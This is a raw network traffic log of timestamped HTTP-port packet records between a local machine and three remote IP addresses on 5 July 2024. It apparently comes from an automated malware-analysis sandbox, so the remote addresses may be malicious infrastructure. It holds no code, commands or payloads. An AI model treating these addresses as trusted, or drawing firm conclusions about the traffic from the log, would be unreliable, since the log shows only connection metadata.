                  Jul 5, 2024 07:26:28.452253103 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.452263117 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.452272892 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.452284098 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.452292919 CEST4916480192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:28.452294111 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.452302933 CEST4916480192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:28.452305079 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.452316046 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.452330112 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.452330112 CEST4916480192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:28.452342033 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.452352047 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.452358007 CEST4916480192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:28.452390909 CEST4916480192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:28.454756975 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.454832077 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.454843044 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.454874992 CEST4916480192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:28.454900980 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.454914093 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.454952955 CEST4916480192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:28.455043077 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.455053091 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.455063105 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.455073118 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.455084085 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.455087900 CEST4916480192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:28.455101967 CEST4916480192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:28.455271006 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.455282927 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.455292940 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.455303907 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.455313921 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.455321074 CEST4916480192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:28.455324888 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.455333948 CEST4916480192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:28.455336094 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.455374002 CEST4916480192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:28.455583096 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.455594063 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.455605030 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.455615997 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.455625057 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.455629110 CEST4916480192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:28.455651999 CEST4916480192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:28.455843925 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.455854893 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.455863953 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.455874920 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.455885887 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.455890894 CEST4916480192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:28.455898046 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.455908060 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.455918074 CEST4916480192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:28.455919027 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.455929995 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.455938101 CEST4916480192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:28.455940962 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.455961943 CEST4916480192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:28.456228971 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.456239939 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.456249952 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.456274986 CEST4916480192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:28.456357002 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.456406116 CEST4916480192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:28.456444025 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.456454039 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.456464052 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.456475019 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.456490993 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.456500053 CEST4916480192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:28.456501007 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.456526041 CEST4916480192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:28.456526041 CEST4916480192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:28.456551075 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.456562042 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.456571102 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.456582069 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.456590891 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.456593990 CEST4916480192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:28.456602097 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.456613064 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.456615925 CEST4916480192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:28.456624985 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.456636906 CEST4916480192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:28.456661940 CEST4916480192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:28.457156897 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.457168102 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.457178116 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.457190037 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.457200050 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.457201004 CEST4916480192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:28.457210064 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.457221031 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.457228899 CEST4916480192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:28.457236052 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.457262039 CEST4916480192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:28.669234991 CEST4916480192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:28.671072006 CEST8049164198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:28.671127081 CEST4916480192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:28.701697111 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:28.706440926 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:28.882263899 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:28.882277966 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:28.882350922 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:28.882371902 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:28.882452965 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:28.882498026 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:28.882523060 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:28.882563114 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:28.882574081 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:28.882610083 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:28.882719994 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:28.882730961 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:28.882740021 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:28.882771015 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:28.883167028 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:28.883214951 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:28.883217096 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:28.883228064 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:28.883270979 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:28.883372068 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:28.883383036 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:28.883421898 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:28.883743048 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:28.883811951 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:28.883821964 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:28.883862972 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:28.883958101 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:28.883970976 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:28.883980989 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:28.884006023 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:28.925611019 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:28.961842060 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:28.961916924 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:28.961926937 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:28.961968899 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:28.961978912 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:28.961991072 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:28.962027073 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:28.962138891 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:28.962323904 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:28.962369919 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:28.962460995 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:28.962546110 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:28.962590933 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:28.962594986 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:28.962606907 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:28.962618113 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:28.962644100 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:28.962779045 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:28.962826014 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:28.963215113 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:28.963224888 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:28.963234901 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:28.963260889 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:28.963327885 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:28.963340044 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:28.963351965 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:28.963363886 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:28.963371992 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:28.963406086 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:28.992805004 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:29.041484118 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.041495085 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.041506052 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.041563034 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:29.041564941 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.041577101 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.041610956 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:29.041733027 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.041744947 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.041754961 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.041795015 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:29.042124033 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.042170048 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:29.042186022 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.042198896 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.042237997 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:29.042311907 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.042324066 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.042359114 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:29.042665958 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.042740107 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.042751074 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.042785883 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:29.042881012 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.042891026 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.042901039 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.042929888 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:29.043256998 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.043299913 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:29.045573950 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:29.200424910 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.200685024 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.200695038 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.200700045 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.200710058 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.200720072 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.200730085 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.200757027 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:29.200768948 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:29.201041937 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.201095104 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.201108932 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.201138973 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:29.201194048 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.201248884 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:29.201411963 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.201457977 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.201468945 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.201507092 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:29.201745033 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.201756001 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.201791048 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:29.201945066 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.201997995 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.202008963 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.202039957 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:29.202173948 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.202183962 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.202193975 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.202204943 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.202223063 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:29.202251911 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:29.202352047 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.202830076 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.202876091 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:29.202889919 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.202900887 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.202936888 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:29.202991962 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.203002930 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.203037977 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:29.279373884 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.279612064 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.279622078 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.279654980 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.279675007 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.279680014 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.279771090 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.279792070 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:29.279815912 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.279827118 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.279875040 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:29.280000925 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.280041933 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.280086994 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:29.294181108 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.295746088 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:29.359112024 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.359157085 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.359168053 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.359200954 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:29.359366894 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.359385967 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.359395981 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.359420061 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:29.359447002 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:29.359505892 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.359528065 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.359571934 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:29.359652042 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.359728098 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.359776020 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:29.359828949 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.359889984 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.359939098 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:29.438153028 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.438208103 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.438218117 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.438232899 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.438251019 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:29.438273907 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:29.438467026 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.438532114 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.438541889 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.438627958 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:29.438631058 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.438642979 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.438654900 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.438683987 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:29.438848019 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.438859940 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.438898087 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:29.438987970 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.438998938 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.439037085 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:29.445985079 CEST4916580192.168.2.22208.95.112.1
                  Jul 5, 2024 07:26:29.450766087 CEST8049165208.95.112.1192.168.2.22
                  Jul 5, 2024 07:26:29.450822115 CEST4916580192.168.2.22208.95.112.1
                  Jul 5, 2024 07:26:29.451122046 CEST4916580192.168.2.22208.95.112.1
                  Jul 5, 2024 07:26:29.455878019 CEST8049165208.95.112.1192.168.2.22
                  Jul 5, 2024 07:26:29.517796993 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.517950058 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.517962933 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.517975092 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.517995119 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:29.518007994 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.518018961 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.518028975 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.518038988 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.518054008 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:29.518074036 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:29.518160105 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.518245935 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.518255949 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.518290043 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:29.518366098 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.518414021 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:29.518448114 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.518496990 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.518568039 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:29.597410917 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.597570896 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.597588062 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.597599983 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.597610950 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.597621918 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.597621918 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:29.597640038 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.597645044 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:29.597665071 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:29.597837925 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.597848892 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.597858906 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.597871065 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.597879887 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:29.597904921 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:29.598004103 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.598051071 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.598057032 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:29.598094940 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.598141909 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:29.676799059 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.676810026 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.676820040 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.676856041 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:29.676948071 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.676959991 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.677000046 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:29.677053928 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.677118063 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.677128077 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.677160025 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:29.677269936 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.677283049 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.677294016 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.677304983 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:29.677321911 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:29.677339077 CEST4916380192.168.2.2291.92.254.194
